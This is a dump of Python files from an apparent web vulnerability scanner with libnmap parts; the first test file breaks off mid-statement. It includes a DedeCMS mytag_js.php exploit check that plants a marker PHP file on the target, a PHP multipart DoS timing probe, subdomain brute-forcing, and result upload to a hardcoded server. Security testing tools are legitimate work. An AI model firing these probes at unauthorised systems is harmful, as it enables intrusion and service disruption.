-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import unittest 5 | import os 6 | from libnmap.parser import NmapParser 7 | 8 | 9 | class TestNmapReportDiff(unittest.TestCase): 10 | def setUp(self): 11 | fdir = os.path.dirname(os.path.realpath(__file__)) 12 | self.flist_full = [{'file': "%s/%s" % (fdir, 'files/2_hosts.xml'), 13 | 'hosts': 2}, 14 | {'file': "%s/%s" % (fdir, 'files/1_hosts.xml'), 15 | 'hosts': 1}] 16 | self.flist = self.flist_full 17 | 18 | def test_diff_host_list(self): 19 | fdir = os.path.dirname(os.path.realpath(__file__)) 20 | r1 = NmapParser.parse_fromfile("%s/%s" % (fdir, 'files/1_hosts.xml')) 21 | r2 = NmapParser.parse_fromfile("%s/%s" % (fdir, 'files/2_hosts.xml')) 22 | r3 = NmapParser.parse_fromfile("%s/%s" % (fdir, 'files/1_hosts.xml')) 23 | r4 = NmapParser.parse_fromfile("%s/%s" % (fdir, 24 | 'files/2_hosts_achange.xml')) 25 | 26 | d1 = r1.diff(r2) 27 | self.assertEqual(d1.changed(), set(['hosts_total', 'commandline', 28 | 'hosts_up', 'scan_type', 29 | 'elapsed'])) 30 | self.assertEqual(d1.unchanged(), set(['hosts_down', 'version', 31 | 'NmapHost::127.0.0.1'])) 32 | self.assertEqual(d1.removed(), set(['NmapHost::74.207.244.221'])) 33 | 34 | d2 = r1.diff(r3) 35 | self.assertEqual(d2.changed(), set([])) 36 | self.assertEqual(d2.unchanged(), set(['hosts_total', 37 | 'commandline', 38 | 'hosts_up', 39 | 'NmapHost::127.0.0.1', 40 | 'elapsed', 41 | 'version', 42 | 'scan_type', 43 | 'hosts_down'])) 44 | self.assertEqual(d2.added(), set([])) 45 | self.assertEqual(d2.removed(), set([])) 46 | 47 | d3 = r2.diff(r4) 48 | self.assertEqual(d3.changed(), set(['NmapHost::127.0.0.1'])) 49 | self.assertEqual(d3.unchanged(), set(['hosts_total', 50 | 'commandline', 51 | 'hosts_up', 52 | 'NmapHost::74.207.244.221', 53 | 'version', 54 | 'elapsed', 55 | 'scan_type', 56 | 'hosts_down'])) 57 | self.assertEqual(d3.added(), set([])) 58 | self.assertEqual(d3.removed(), 
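# -*- coding: utf-8 -*-
# /thirdparty/libnmap/diff.py


class DictDiffer(object):
    """
        Calculate the difference between two dictionaries as:
        (1) items added
        (2) items removed
        (3) keys same in both but changed values
        (4) keys same in both and unchanged values

        "added" and "removed" are relative to ``past_dict``: a key that is
        only in ``current_dict`` is added, a key that is only in
        ``past_dict`` is removed.
    """
    def __init__(self, current_dict, past_dict):
        self.current_dict = current_dict
        self.past_dict = past_dict
        self.set_current = set(current_dict.keys())
        self.set_past = set(past_dict.keys())
        self.intersect = self.set_current.intersection(self.set_past)

    def added(self):
        """Return the keys present only in the current dictionary."""
        return self.set_current - self.intersect

    def removed(self):
        """Return the keys present only in the past dictionary."""
        return self.set_past - self.intersect

    def changed(self):
        """Return the shared keys whose values differ."""
        return set(o for o in self.intersect
                   if self.past_dict[o] != self.current_dict[o])

    def unchanged(self):
        """Return the shared keys whose values are equal."""
        return set(o for o in self.intersect
                   if self.past_dict[o] == self.current_dict[o])


class NmapDiff(DictDiffer):
    """
        NmapDiff compares two objects of same type to enable the user to check:

        - what has changed
        - what has been added
        - what has been removed
        - what was kept unchanged

        NmapDiff inherits from DictDiffer, which makes the actual comparison.
        The different methods from DictDiffer used by NmapDiff are the
        following:

        - NmapDiff.changed()
        - NmapDiff.added()
        - NmapDiff.removed()
        - NmapDiff.unchanged()

        Each of them returns a python set() of keys which have changed in the
        compared objects. To check the different keys that could be returned,
        refer to the get_dict() method of the objects you wish to
        compare (i.e: libnmap.objects.NmapHost, NmapService,...).
    """
    def __init__(self, nmap_obj1, nmap_obj2):
        """
            Constructor of NmapDiff:

            - Checks if the two objects are of the same class
            - Checks if the objects are "comparable" by comparing their
              ``id`` attributes
            - Hands both get_dict() results to DictDiffer, with nmap_obj1 as
              the "current" side and nmap_obj2 as the "past" side

            :raises NmapDiffException: if class or id do not match
        """
        if(nmap_obj1.__class__ != nmap_obj2.__class__ or
           nmap_obj1.id != nmap_obj2.id):
            raise NmapDiffException("Comparing objects with non-matching id")

        self.object1 = nmap_obj1.get_dict()
        self.object2 = nmap_obj2.get_dict()

        DictDiffer.__init__(self, self.object1, self.object2)

    def __repr__(self):
        return ("added: [{0}] -- changed: [{1}] -- "
                "unchanged: [{2}] -- removed [{3}]".format(self.added(),
                                                           self.changed(),
                                                           self.unchanged(),
                                                           self.removed()))


class NmapDiffException(Exception):
    """Raised when two objects cannot be compared by NmapDiff."""
    def __init__(self, msg):
        # Pass the message to Exception as well, so that str(exc) and
        # tracebacks show it; before, only the ``msg`` attribute carried it.
        Exception.__init__(self, msg)
        self.msg = msg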
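#!/usr/bin/env python
# /thirdparty/libnmap/plugins/mongodb.py
import json
from pymongo import MongoClient
from bson.objectid import ObjectId

from libnmap.reportjson import ReportEncoder
from libnmap.parser import NmapParser
from libnmap.plugins.backendplugin import NmapBackendPlugin


class NmapMongodbPlugin(NmapBackendPlugin):
    """
        This class handles the persistence of NmapReport objects in mongodb.
        The implementation uses pymongo.
        Objects of this class must be created via
        BackendPluginFactory.create(**url), where url is a named dict like
        {'plugin_name': "mongodb"}; this dict may receive all the parameters
        MongoClient() supports.
    """
    def __init__(self, dbname=None, store=None, **kwargs):
        NmapBackendPlugin.__init__(self)
        # When dbname/store are not given, self.dbname and self.store must
        # already exist -- presumably as defaults on the base class; confirm
        # in backendplugin.py.
        if dbname is not None:
            self.dbname = dbname
        if store is not None:
            self.store = store
        self.dbclient = MongoClient(**kwargs)
        self.collection = self.dbclient[self.dbname][self.store]

    def insert(self, report):
        """
            create a json object from an NmapReport instance
            :param NmapReport: obj to insert
            :return: str id
            :raises Exception: when the document cannot be stored
        """
        j = json.dumps(report, cls=ReportEncoder)
        try:
            oid = self.collection.insert(json.loads(j))
        except Exception:
            # Was a bare ``except:``, which also turned KeyboardInterrupt and
            # SystemExit into this generic error.
            raise Exception("Failed to insert nmap object in MongoDB")
        return str(oid)

    def get(self, str_report_id=None):
        """ select a NmapReport by Id
            :param str: id
            :return: NmapReport object, or None when nothing matches
        """
        rid = str_report_id
        nmapreport = None
        if str_report_id is not None and isinstance(str_report_id, str):
            rid = ObjectId(str_report_id)

        if isinstance(rid, ObjectId):
            # get a specific report by mongo's id
            resultset = self.collection.find({'_id': rid})
            if resultset.count() == 1:
                # search by id means only one in the iterator
                record = resultset[0]
                # remove mongo's id to recreate the NmapReport Obj
                del record['_id']
                nmapreport = NmapParser.parse_fromdict(record)
        return nmapreport

    def getall(self, dict_filter=None):
        """return a list of tuple (id,NmapReport) saved in the backend
           TODO : add a filter capability (dict_filter is currently ignored)
        """
        nmapreportlist = []
        resultset = self.collection.find()
        for report in resultset:
            oid = report['_id']
            del report['_id']
            nmapreport = NmapParser.parse_fromdict(report)
            nmapreportlist.append((oid, nmapreport))
        return nmapreportlist

    def delete(self, report_id=None):
        """
            delete an obj from the backend
            :param str: id (a str or an ObjectId)
            :return: dict document with result or None

            Only a str or an ObjectId is accepted as id, the same rule get()
            applies. Any other value used to be placed into the ``_id``
            filter as-is; a dict such as ``{'$ne': None}`` arriving from
            request data would then have been evaluated by MongoDB as a query
            operator and matched every stored report.
        """
        rid = report_id
        if report_id is not None and isinstance(report_id, str):
            rid = ObjectId(report_id)

        if not isinstance(rid, ObjectId):
            return None
        return self.collection.remove({'_id': rid})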
# coding=utf-8
# /teye_poc/php_multipart_dos.py
'''
php_multipart_dos.py
'''
import sys
from LogManager import log
from teye_poc.PocScan import PocScan
from misc.common import rand_letters
from teye_web.http.URL import URL
from wCurl import wcurl
import time
import datetime
import socket
import requests
import httplib

httplib.HTTPConnection.debuglevel = 0


class php_multipart_dos(PocScan):
    '''
    Timing check for the PHP multipart/form-data parsing issue described in
    ``_poc_info`` (WID-2015-1002).

    One request carries a part header continued over ``_linenum`` extra
    lines, two carry an ordinary part of the same size; the response times
    are compared. The verdict is a heuristic built on three samples, so
    network jitter can push it either way.
    '''

    def __init__(self):
        '''
        Set the PoC metadata and the size of the generated data.
        '''
        self._poc_info = {
            'w_hat': {
                'author': "imiyoo",
                'blog': "http://www.imiyoo.com",
                'team': "W.A.T",
                'create_time': "2015-05-15"
            },
            'w_vul': {
                'id': u"WID-2015-1002",
                'title': u"PHP multipart/form-data 远程DOS漏洞",
                'method': u"POST",
                'tag': u"php",
                'rank': u"高危",
                'info': u"http://www.watscan.com/"
            }
        }
        self._linenum = 10
        self._data_type = ["normal", "payload"]

    def check(self, url):
        '''
        Time one crafted and two ordinary uploads against the domain URL.

        The target is reported (printed) when the crafted request is slower
        than the first baseline by more than twice the spread of the two
        baselines.
        '''
        log.info(u"正在检测目标是否存在:[%s]..." % self.get_title())
        url_domain = url.get_domain_url()
        t_payload = self.get_res_time(url_domain, type="payload")
        t_base_1 = self.get_res_time(url_domain, type="normal")
        t_base_2 = self.get_res_time(url_domain, type="normal")
        print("%s %s %s" % (t_payload, t_base_1, t_base_2))
        slower = t_payload > t_base_1
        if slower and abs(t_payload - t_base_1) > 2 * abs(t_base_1 - t_base_2):
            # NOTE(review): the result is only printed; the security_hole()
            # call is commented out, so nothing is recorded as a finding.
            # security_hole(domain)
            print(url_domain)

    def _gen_payload(self):
        '''
        Return ``_linenum`` lines, each made of ``_linenum`` "a" characters.
        '''
        line = "a" * self._linenum + "\n"
        return line * self._linenum

    def _gen_testdata(self, data):
        '''
        Return random letters of the same length as ``data``.
        '''
        return rand_letters(len(data))

    def get_post_data(self, type="normal"):
        '''
        Build the multipart body for the "normal" or the "payload" request.

        Both bodies carry the same number of generated bytes; they differ in
        whether those bytes sit in the part body or in the part header.
        '''
        fuzzdata = self._gen_payload()
        testdata = self._gen_testdata(fuzzdata)
        parts = ["--5b4729970b854f95b01a01a2e799996f\r\n"]
        if type == "normal":
            parts.append("Content-Disposition: form-data; name=\"filename\"; filename=\"test.txt\"\r\n\r\n")
            parts.append(testdata + "just for a test!\r\n\r\n")
        else:
            parts.append("Content-Disposition: form-data; name=\"filename\"; filename=\"test.txt\"" + fuzzdata + "\r\n\r\n")
            parts.append("just for a test!\r\n\r\n")
        parts.append("--5b4729970b854f95b01a01a2e799996f--")
        postdata = "".join(parts)
        print(len(postdata))
        return postdata

    def get_res_time(self, url, type="normal"):
        '''
        POST one body of the given type and return the elapsed time that
        ``requests`` reports for it.
        '''
        # NOTE(review): no timeout is passed, so a server that stops
        # answering blocks this call indefinitely.
        content_type = "multipart/form-data; boundary=5b4729970b854f95b01a01a2e799996f"
        body = self.get_post_data(type)
        response = requests.post(url, headers={"Content-Type": content_type},
                                 data=body)
        return response.elapsed

    def get_class_name(self):
        '''
        Return the class name.
        '''
        return self.__class__.__name__


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit()
    target = sys.argv[1]
    print("Scanning Target======>%s" % (target))
    urlobj = URL(target)
    p = php_multipart_dos()
    p.check(urlobj)
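#coding=utf-8
# /teye_util/mysqlmanager.py
'''
mysqlmanager.py
'''
import rpyc
import hashlib
import datetime

from LogManager import log
from teye_data.config import cfg


class mysqlmanager:
    '''
    Client that reports scan progress and results to the task database
    through an rpyc service.

    Host and port come from ``cfg`` (``RPC_SERVER_IP`` / ``RPC_SERVER_PORT``)
    and the connection is opened with a plain ``rpyc.connect()``, so this
    file sets up neither credentials nor TLS. Whatever is handed to the
    ``client_*`` calls (target host name, findings, counters) reaches that
    server over such a connection.
    '''

    def __init__(self):
        self._client = None
        self._host = None
        self._port = None
        # Set by _init(); defined here so that a call made before _init()
        # fails inside the try blocks below and is logged there.
        self._taskid = None
        self._website = None

    def _init(self):
        '''
        Read task id, target host and RPC endpoint from ``cfg`` and connect.

        A failed connection is logged and leaves ``_client`` as None.
        '''
        self._taskid = int(cfg.getData('taskid'))
        self._website = cfg.getData("target").get_host()

        self._host = cfg.getData('RPC_SERVER_IP')
        self._port = int(cfg.getData('RPC_SERVER_PORT'))

        try:
            self._client = rpyc.connect(self._host, self._port)
            self._client.root.open()
        except Exception as e:
            log.error(str(e))

    def md5hex(self, str):
        '''
        Return the hexadecimal MD5 digest of ``str``.

        MD5 is not collision resistant; use the value as a fingerprint only,
        never as an integrity or authentication check.
        '''
        m = hashlib.md5()
        m.update(str)
        return m.hexdigest()

    #exposed_client_update_percent(self,taskid,progress):
    def t_update_percent(self, progress):
        '''
        Report the scan progress of the current task.
        '''
        try:
            self._client.root.client_update_progress(self._taskid, progress)
        except Exception as e:
            log.error(str(e))

    #exposed_client_update_starttime(self,taskid,starttime):
    def wat_update_starttime(self, starttime):
        '''
        Report the start time of the current task.
        '''
        try:
            self._client.root.client_update_starttime(self._taskid, starttime)
        except Exception as e:
            log.error(str(e))

    #exposed_client_update_finishtime(self,taskid,finishtime):
    def wat_update_finishtime(self, finishtime):
        '''
        Report the finish time of the current task.
        '''
        try:
            self._client.root.client_update_finishtime(self._taskid, finishtime)
        except Exception as e:
            log.error(str(e))

    #exposed_client_insert_brute
    def wat_report_bruteurl(self, bruteurl):
        '''
        Report a URL found by brute forcing for the current task.
        '''
        try:
            # The original read self._domain, which this class never sets;
            # _init() stores the target host in self._website.
            # NOTE(review): confirm the server expects the host name here.
            self._client.root.client_insert_bruteurl(self._taskid, self._website, bruteurl)
        except Exception as e:
            # Was ``om.out.error``: ``om`` is not defined in this module, so
            # the handler itself raised NameError and hid the real error.
            log.error(str(e))

    def t_task_exist(self):
        '''
        Ask the server whether a report row exists for the current task.

        :return: the server's answer, or None when the call failed.
        '''
        result = None
        try:
            result = self._client.root.client_task_exist(self._taskid)
        except Exception as e:
            log.error(str(e))

        return result

    #exposed_client_insert_reports(self,taskid,website,high,middle,low,notice)
    def t_report_vuln(self, result, high_count, middle_count, low_count, notice_count):
        '''
        Store the scan result: update the row when the task already has one,
        insert a new row otherwise.
        '''
        if self.t_task_exist():
            try:
                self._client.root.client_update_reports(self._taskid, result, high_count, middle_count, low_count, notice_count)
            except Exception as e:
                log.error(str(e))
        else:
            try:
                self._client.root.client_insert_reports(self._taskid, self._website, result, high_count, middle_count, low_count, notice_count)
            except Exception as e:
                log.error(str(e))

    def close(self):
        '''
        Close the RPC connection if one is open.

        :return: True when there was nothing to close, otherwise None.
        '''
        if self._client:
            self._client.close()
        else:
            return True


mm = mysqlmanager()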
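#coding=utf-8
# /teye_web/parser/lru.py
'''
LRU.py
'''
from __future__ import with_statement

import threading


class Node(object):
    """One entry of the doubly linked list; ``me`` is the (key, value) pair."""
    __slots__ = ['prev', 'next', 'me']

    def __init__(self, prev, me):
        self.prev = prev
        self.me = me
        self.next = None


class LRU:
    """
    Implementation of a length-limited O(1) LRU queue.
    Built for and used by PyPE:
    http://pype.sourceforge.net
    Copyright 2003 Josiah Carlson.

    This is a list of the modifications that I (Andres Riancho) introduced to the code:
        - Thread safety

    Only item get, set and delete take the lock. Membership tests, len(),
    keys(), values() and the iterators read the structures without it, so a
    concurrent writer can change the queue while they run.

    >>> lru_test = LRU(4)
    >>> lru_test['1'] = 1
    >>> lru_test['2'] = 1
    >>> lru_test['3'] = 1
    >>> lru_test['4'] = 1

    # Adding one more, the '1' should go away
    >>> lru_test['5'] = 1
    >>> '1' in lru_test
    False
    >>> '5' in lru_test
    True
    """
    def __init__(self, count, pairs=()):
        # ``pairs`` defaulted to a shared mutable list; an empty tuple gives
        # the same behaviour without the shared object.
        self.lock = threading.RLock()
        self.count = max(count, 1)
        self.d = {}
        self.first = None
        self.last = None
        for key, value in pairs:
            self[key] = value

    def __contains__(self, obj):
        return obj in self.d

    def __getitem__(self, obj):
        """Return the value for ``obj`` and mark it as most recently used."""
        with self.lock:
            item = self.d[obj].me
            # Re-inserting moves the entry to the end of the list.
            self[item[0]] = item[1]
            return item[1]

    def __setitem__(self, obj, val):
        """Store ``val`` as the newest entry, evicting the oldest if full."""
        with self.lock:
            if obj in self.d:
                del self[obj]
            nobj = Node(self.last, (obj, val))
            if self.first is None:
                self.first = nobj
            if self.last:
                self.last.next = nobj
            self.last = nobj
            self.d[obj] = nobj
            if len(self.d) > self.count:
                # count is at least 1, so the list holds two or more nodes
                # here and the oldest one always has a successor. (The old
                # "first == last" branch could not be reached.)
                oldest = self.first
                oldest.next.prev = None
                self.first = oldest.next
                oldest.next = None
                del self.d[oldest.me[0]]

    def __delitem__(self, obj):
        """Unlink the entry for ``obj``; raises KeyError if it is missing."""
        with self.lock:
            nobj = self.d[obj]
            if nobj.prev:
                nobj.prev.next = nobj.next
            else:
                self.first = nobj.next
            if nobj.next:
                nobj.next.prev = nobj.prev
            else:
                self.last = nobj.prev
            del self.d[obj]

    def __iter__(self):
        """Yield the stored values (not the keys), oldest first."""
        cur = self.first
        while cur is not None:
            cur2 = cur.next
            yield cur.me[1]
            cur = cur2

    def iteritems(self):
        """Yield (key, value) pairs, oldest first."""
        cur = self.first
        while cur is not None:
            cur2 = cur.next
            yield cur.me
            cur = cur2

    def iterkeys(self):
        return iter(self.d)

    def itervalues(self):
        for i, j in self.iteritems():
            yield j

    def keys(self):
        return self.d.keys()

    def __len__(self):
        return len(self.d)

    def values(self):
        return [i.me[1] for i in self.d.values()]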
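#!/usr/bin/env python
# coding=utf-8
# /teye_poc/dedecms_mytag_getshell.py

import sys

# NOTE(review): a developer's absolute home path is appended to the module
# search path. On another machine it either does nothing or, if that
# directory exists and someone else can write to it, lets them supply the
# modules imported below.
sys.path.append("/Users/imiyoo/workplace/tscanner/")

import re
import time
from misc.common import md5
from teye_web.http.URL import URL
from teye_web.util.error_sql import get_error_sql_key

# urllib2,requests,httplib2
from wCurl import wcurl

from teye_poc.PocScan import PocScan
from LogManager import log

import httplib

# NOTE(review): HTTP debug output is switched on for the whole process, so
# request and response headers are written to stdout.
httplib.HTTPConnection.debuglevel = 1

from teye_data.vulnmanager import vm


class dedecms_mytag_getshell(PocScan):
    '''
    Check for the DedeCMS v5.6 ``plus/mytag_js.php`` issue described in
    ``_poc_info`` (WID-2011-1032).

    The check is not read-only: it sends the request with the ``cfg_db*``
    overrides and then looks for the marker file ``_file_key`` under the
    target, so a positive result means that file now exists there and has to
    be removed during clean-up.

    On the defending side the probe shows up in the access log as a GET for
    ``plus/mytag_js.php`` whose query string carries ``cfg_dbhost``,
    ``cfg_dbuser``, ``cfg_dbpwd``, ``cfg_dbname`` and ``cfg_dbprefix``.
    '''

    def __init__(self):
        '''
        Set the PoC metadata, the database override values and the markers.
        '''
        self._poc_info = {

            'w_hat': {
                'author': "imiyoo",
                'blog': "http://www.imiyoo.com",
                'team': "W.A.T",
                'create_time': "2011-08-25"
            },
            'w_vul': {
                'id': u"WID-2011-1032",
                'title': u"Dedecms v5.6 mytag_js.php getshell漏洞",
                'method': u"GET",
                'tag': u"dedecms",
                'rank': u"高危",
                'info': u"http://www.watscan.com/"
            }
        }

        self._db_info = ('127.0.0.1', 'root', 'root', 'book', 'dede_')
        self._file_key = "plus/" + md5("wat2018") + ".php"
        self._data_key = md5("wattest")
        self._vuln_file = "plus/mytag_js.php"

        # Scan mode: 0 probes relative to the domain root, 1 probes relative
        # to the URL path the user supplied.
        self._scan_mode = 1

    def check(self, url):
        '''
        Send the probe, wait one second, then fetch the marker file and
        record a finding when it contains ``_data_key``.

        :param url: URL object of the target.
        '''
        log.info(u"正在检测目标是否存在:[%s]..." % self.get_title())
        if not self._scan_mode:
            domain_path = url.get_domain_path()
            exp_url = domain_path.urljoin(self._vuln_file)
            chk_url = domain_path.urljoin(self._file_key)
        else:
            exp_url = url.urljoin(self._vuln_file)
            print(exp_url)
            chk_url = url.urljoin(self._file_key)

        data = "aid=1&cfg_dbhost=%s&cfg_dbuser=%s&cfg_dbpwd=%s&cfg_dbname=%s&cfg_dbprefix=%s" % self._db_info
        wcurl.get(exp_url, params=data)

        time.sleep(1)

        chk_res = wcurl.get(chk_url)
        if self._find_vuln(chk_res, self._data_key):
            print("test")
            self.security_hole(exp_url)

    def _find_vuln(self, res, key):
        '''
        Tell whether the response body contains ``key``.

        :param res: response object, or None when the request failed.
        :param key: marker string to look for.
        :return: True when the marker is present, otherwise False.
        '''
        # A failed request used to end in AttributeError on ``res.body``.
        if res is None:
            return False

        body = res.body
        print(key)
        print(body)
        if body is None:
            return False

        return body.find(key) > -1

    def get_name(self):
        '''
        Return the class name.
        '''
        return self.__class__.__name__


if __name__ == "__main__":
    from optparse import OptionParser

    usage = "usage: %prog [options] arg"
    parser = OptionParser(usage)
    parser.add_option("-u", "--url", action="store", dest="url", default=None, help="Scan the target url")
    (options, args) = parser.parse_args()
    if not options.url:
        parser.print_help()
        sys.exit(-1)
    else:
        url = options.url
        target_url = URL(url)
        check_inst = dedecms_mytag_getshell()
        check_inst.check(target_url)
        print(vm.get_all_vuln())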
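#coding=utf-8
# /teye_domain/DomainScan.py
'''
DomainScan.py
'''
import os
import sys

# Load the configuration module.
# NOTE(review): ".." is resolved against the current working directory, so
# which teye_config gets imported depends on where the script is started.
sys.path.append("..")
import teye_config as Settings

import re
import time
import urllib
import urllib2
import dns.exception
import dns.resolver
import dns.rdatatype
from LogManager import log


class DomainScan:
    '''
    Enumerate subdomains of a root domain by resolving names from a wordlist.
    '''
    # Once more than this many names resolve to the same address, the zone is
    # treated as having a wildcard record and the scan stops.
    MAX_WILD_RECORDS = 8

    def __init__(self,domain_file=None):
        '''
        :param domain_file: wordlist of subdomain labels; defaults to
            ``Settings.DOMAIN_FILE``.
        '''
        self._ip_list = []

        # Address -> number of times it has been returned so far.
        self._ip_hits = {}

        self._subdomain_list = []

        self._subdomain_file = domain_file if domain_file else Settings.DOMAIN_FILE

        self._black_list = ['127.0.0.1']

        self._resolver = dns.resolver.Resolver()
        # Baidu DNS: 180.76.76.76
        # Ali DNS:   223.5.5.5, 223.6.6.6
        # Every candidate name is sent to these public resolvers.
        self._resolver.nameservers=['180.76.76.76','223.5.5.5','223.6.6.6']

    def _load_domain(self):
        '''
        Read the wordlist, skipping lines that start with "#".
        '''
        sub_list = []
        with open(self._subdomain_file) as f:
            for line in f:
                sub = line.strip()
                if sub.startswith("#"):
                    continue
                sub_list.append(sub)

        return sub_list

    def domain_scan(self,root_domain):
        '''
        Resolve ``<label>.<root_domain>`` for every wordlist label.

        A name is kept when it resolves and none of its addresses is in the
        black list. The scan ends early when a wildcard record is detected.

        :param root_domain: domain to enumerate.
        :return: list of subdomains that resolved.
        '''
        sublist = self._load_domain()

        for label in sublist:
            subdomain = label + "." + root_domain
            log.info("DomainScan Scanning:" + subdomain)

            try:
                resp = self._resolver.query(subdomain)
            except dns.exception.DNSException:
                # The name does not exist, has no answer or timed out. The
                # former catch-all ``except Exception`` also hid the KeyError
                # described below.
                continue

            if not resp:
                continue

            is_wild_record = False
            is_local_ip = False
            for record in resp:
                ipaddr = record.address

                if ipaddr in self._black_list:
                    is_local_ip = True
                    break

                # The counter used to be a dict re-created for every record,
                # so "+= 1" on an address seen before raised KeyError; the
                # name was then dropped silently and the wildcard threshold
                # could never be reached.
                hits = self._ip_hits.get(ipaddr, 0) + 1
                self._ip_hits[ipaddr] = hits

                if ipaddr not in self._ip_list:
                    self._ip_list.append(ipaddr)
                elif hits > DomainScan.MAX_WILD_RECORDS:
                    is_wild_record = True

            if is_wild_record:
                log.info("DomainScan Found Wild Record")
                break

            if subdomain not in self._subdomain_list and not is_local_ip:
                self._subdomain_list.append(subdomain)

        return self._subdomain_list

    def get_ip_list(self):
        '''
        Return the distinct addresses seen during the scan.
        '''
        return self._ip_list


def get_subdomain_date(subdomain):
    '''
    Look up the "date first seen" of a host in the Netcraft site report.

    The host name is sent to a third-party service over plain HTTP, so the
    names being examined are visible to that service and on the network
    path.

    :param subdomain: host name to look up.
    :return: the date text, or the string "None" when it is unavailable.
    '''
    api_url = "http://toolbar.netcraft.com/site_report?url=%s"

    # Percent-encode the value so it cannot add parameters to the query.
    req_url = api_url % urllib.quote(subdomain, safe='')

    try:
        # NOTE(review): no timeout is passed to urlopen().
        res = urllib2.urlopen(req_url)
        res_body = res.read()
    except Exception:
        return "None"

    reg = re.compile(r"date\s+first\s+seen</th>(.*?)</td>",re.S|re.IGNORECASE)
    result = reg.search(res_body)
    if result is None:
        return "None"

    # The third ">"-separated piece of the match holds the cell text.
    t2 = result.group().split(">")
    if len(t2)>3 and t2[2].find("unavailable") == -1:
        return t2[2].replace("</td","")

    return "None"


if __name__=="__main__":
    if len(sys.argv)<2:
        print("Plz Input Root Domain!")
        sys.exit()

    domain = sys.argv[1]

    print(domain)

    filename = "domain_name.list"

    ds = DomainScan(filename)

    start_time = time.time()
    subdomain_list = ds.domain_scan(domain)
    end_time = time.time()
    print("Elapsed:"+str(end_time-start_time))
    print(len(subdomain_list))

    for item in subdomain_list:
        s = item.strip()
        t = get_subdomain_date(s)
        print("%s----First Seen:%s" % (s,t))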
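#!/usr/bin/env python
#coding=utf-8
# /teye.py

import os
import sys
from teye_util.banner import scan_banner
import teye_config as Settings

import optparse
import json
import datetime
from teye_web.http.URL import URL
from teye_web.http.cookie import cookie
from teye_data.config import cfg
from teye_data.info import db_info

from teye_data.vulnmanager import vm


def parseargs():
    '''
    Parse the command line.

    :return: the optparse options object (url, profile, taskid, mode).
    '''
    parser = optparse.OptionParser(usage="%prog [OPTIONS]\n\n" \
        "example:%prog -s \"http://testphp.vulnweb.com/\" -p '{\"useragent\":\"TScanner/1.0\",\"type\":2,\"cookie\":\"\"}' -t 100000")

    # No default target: the option used to default to a fixed third-party
    # site, so any run that passed other options but forgot -s scanned that
    # site.
    parser.add_option("-s","--URL",action="store",dest="url", \
        help="scan target,scan the url", \
        default=None)

    parser.add_option("-p","--Profile",action="store",dest="profile", \
        help="scan profile,config the task")

    parser.add_option("-t","--Taskid",action="store",dest="taskid", \
        help="scan taskid,remote database index", \
        default="100000")

    parser.add_option("-m","--Mode",action="store",dest="mode", \
        help="scan mode,teye or tweb", \
        default="tweb")

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(-1)

    options,args = parser.parse_args()

    if not options.url:
        parser.error("no scan target given, use -s/--URL")

    return options


def scan_config():
    '''
    Fill the global ``cfg`` store from the command line and the JSON profile.

    The RPC server address is fixed in this function. ``remote_mysql`` is
    switched on for task ids above 100000.
    NOTE(review): what ``remote_mysql`` enables is not visible here;
    presumably results are then sent to that server -- confirm in the
    callers.
    '''
    scan_banner()
    options = parseargs()

    cfg.save("target",URL(options.url))
    cfg.save("profile",options.profile)
    cfg.save("taskid",int(options.taskid))
    cfg.save("mode",options.mode)

    #rpc server configure
    cfg.save("RPC_SERVER_IP","123.57.242.231")
    if cfg["mode"].lower()=="tweb":
        cfg.save("RPC_SERVER_PORT",9999)
    else:
        cfg.save("RPC_SERVER_PORT",8888)

    if cfg["taskid"]>100000:
        cfg["remote_mysql"]=True
    else:
        cfg["remote_mysql"]=False

    #profile config
    cfg["domain_scan"]=False
    t_profile = cfg.get("profile")

    if t_profile is not None:
        #type,rate,useragent,proxy,cookie
        set_profile = json.loads(t_profile)

        # A profile without "type" used to fail on int(None).
        if int(set_profile.get("type") or 0)==2:
            cfg["domain_scan"]=True
            cfg["max_domain_scan"]=20

        if set_profile.get("useragent"):
            cfg["scan_signature"] = set_profile.get("useragent")
        else:
            cfg["scan_signature"] = "TScanner/1.0"

        cfg["scan_cookies"] = cookie(set_profile.get("cookie"))

        # The key was misspelled "pxory", so a proxy configured as "proxy"
        # was ignored and requests went out directly. The old spelling is
        # still accepted for existing profiles.
        # NOTE(review): only the "http" scheme is mapped; https requests are
        # presumably not proxied -- confirm how wCurl uses this dict.
        proxy = set_profile.get("proxy") or set_profile.get("pxory")
        cfg["scan_proxies"] = {'http':proxy} if proxy else {}

    else:
        cfg["scan_signature"] = "TScanner/1.0"
        cfg["scan_cookies"] = {}
        cfg["scan_proxies"] = {}

    l_profile={}
    l_profile["useragent"] =cfg["scan_signature"]
    l_profile["cookie"] =cfg["scan_cookies"]
    l_profile["proxies"] =cfg["scan_proxies"]

    db_info.set_profile(l_profile)


if __name__=="__main__":
    scan_config()

    # Imported after scan_config(), as in the original.
    from teye_core.tcore import tCore
    scan_engine = tCore()

    try:
        scan_engine.scan_site(cfg.get("target"))

    except Exception as e:
        print(str(e))
        db_info.set_end_time(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))

    finally:
        # Results are stored and the report is written even after a failure.
        scan_engine.store_vuln()
        filename = cfg.get("target").get_host()+".html"
        scan_engine.generate_report(filename)
        scan_engine.end()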
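#coding=utf-8
# /teye_finger/FingerScan.py
'''
FingerScan.py
'''

import os
import sys

# Load the configuration module.
sys.path.append("..")
import teye_config as Settings

import re
import json
import hashlib

from wCurl import wcurl
from LogManager import log

from teye_web.http.URL import URL


class FingerScan:
    '''
    Identify the web application behind a site by requesting known paths and
    comparing headers, body or body MD5 with a fingerprint database.

    The database holds one JSON object per line. Its ``headers`` and ``body``
    values are used as regular expressions, so the file has to come from a
    trusted source.
    '''
    def __init__(self):
        '''
        Load the fingerprint database named by ``Settings.FINGER_FILE``.
        '''
        self._app_file = Settings.FINGER_FILE
        # Fingerprint scan mode: 0 probes from the site root, 1 probes
        # relative to the path that was given.
        self._scan_mode=0

        # Close the file after reading; the handle used to stay open.
        with open(self._app_file,"rb") as db_file:
            self._app_db = db_file.readlines()

        self._server_finger = None

        self._http_code = None

    def md5(self,content):
        '''
        Return the hexadecimal MD5 digest of ``content``, or None when it
        cannot be hashed. The digest only serves as a content fingerprint.
        '''
        if isinstance(content,unicode):
            content = content.encode("utf-8")

        m = hashlib.md5()

        try:
            m.update(content)
            return m.hexdigest()
        except Exception:
            return None

    def set_mode(self,mode):
        '''
        Select the scan mode (0 or 1, see ``__init__``).
        '''
        self._scan_mode = mode

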